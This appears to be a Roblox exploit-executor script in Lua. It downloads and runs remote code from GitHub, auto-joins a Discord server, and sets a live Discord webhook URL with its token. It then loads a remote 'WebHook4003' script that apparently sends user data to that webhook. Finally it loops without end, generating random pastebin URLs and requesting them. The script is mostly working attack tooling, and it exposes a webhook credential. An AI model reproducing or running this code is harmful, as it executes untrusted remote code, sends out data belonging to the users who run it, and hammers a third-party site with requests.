local Module = loadstring(game:HttpGet("https://raw.githubusercontent.com/RegularVynixu/Utilities/main/Discord%20Inviter/Source.lua"))()

Module.Prompt({ invite = "https://discord.gg/jTDQw2E3", name = "(SA)" })

Module.Join("https://discord.gg/jTDQw2E3")


getgenv().WebhookHere = "https://discord.com/api/webhooks/1015029355132497950/ybmdAUGu0_-9FBvuGbL_KFUo8zUXWtBhoxJysAE_s_wFrUOFFZDGTonK-DDKx0hVEAvu"
 
loadstring(game:HttpGet("https://raw.githubusercontent.com/LuaQLeak/Scripts/main/WebHook4003.lua"))()

local chars = {"a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "1", "2", "3", "4", "5", "6", "7", "8", "9", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z"}

math.randomseed(math.random(1,10000))
while wait() do
local en = ""
for i = 1, 8 do
   en = en .. chars[math.random(1, #chars)]
end
local pbfake = "https://pastebin.com/raw/" .. en

local HttpUrls = { --Make sure you always separate every new line with a comma execpt the last one if you are making a new link
pbfake
}
function thing()
while wait() do
for i = 1,12 do
local Chosen = math.random(0, #HttpUrls) -- random #
local pastebinText = game:HttpGet(tostring(HttpUrls[Chosen]))
end
end
end



local succ = pcall(thing)
if succ then
   print("no errors returned")
end
end
